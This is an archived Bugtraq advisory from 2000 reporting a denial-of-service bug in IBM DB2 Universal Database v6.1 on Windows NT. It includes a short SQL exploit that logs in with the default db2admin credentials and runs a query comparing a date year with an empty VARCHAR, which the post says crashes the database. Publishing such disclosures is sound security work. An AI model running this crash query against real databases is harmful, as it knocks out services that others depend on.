[17938] in bugtraq


IBM DB2 SQL DOS

daemon@ATHENA.MIT.EDU (benjurry)
Wed Dec 6 16:54:11 2000

Mime-Version: 1.0
Content-Type: text/plain; charset="gb2312"
Message-Id:  <007e01c05ebf$cf18fe20$3300a8c0@dudu>
Date:         Tue, 5 Dec 2000 21:32:25 +0800
Reply-To: benjurry <benjurry@YEAH.NET>
From: benjurry <benjurry@YEAH.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit

1.Description
    The DB2 Universal Database builds upon the stability and performance of DB2 on the mainframe and provides the features required in a distributed database product. DB2 Universal Database (UDB) is IBM's relational database server solution for the UNIX, OS/2 and Windows NT/2000 operating environments. More than 70% of the world's major companies rely on DB2 to manage their mission-critical business applications.

2.Problem:
    There is a bug that is triggered when you execute a particular SQL statement involving time and VARCHAR data, which makes the database crash.
    
3.Platforms: IBM DB2 for Windows NT (v6.1)

4.Exploit
    connect reset;
    connect to sample user db2admin using db2admin;
    select * from employee where year(birthdate)=1999 and firstnme<'';

These SQL statements will make the database crash.
5.About us
    RAF Info-Tech Corporation Ltd. is an Internet security consulting and service provider. The headquarters of RAF is located in Shenzhen, an exciting city in southern China. To keep the company at the leading edge of the technology, RAF established an Internet security research center at Tsinghua University in Beijing.
Based on the "RAF Security Theory", the company can currently provide customized Internet security solutions to various clients. RAF also provides technical services and support to Internet security product manufacturers.

If you are interested in RAF's services or have any questions for the company, please e-mail CHINARAF@PUBLIC.SZPTT.NET.CN or benjurry@263.net.

6.Thanks to my friends xq and kingworld.





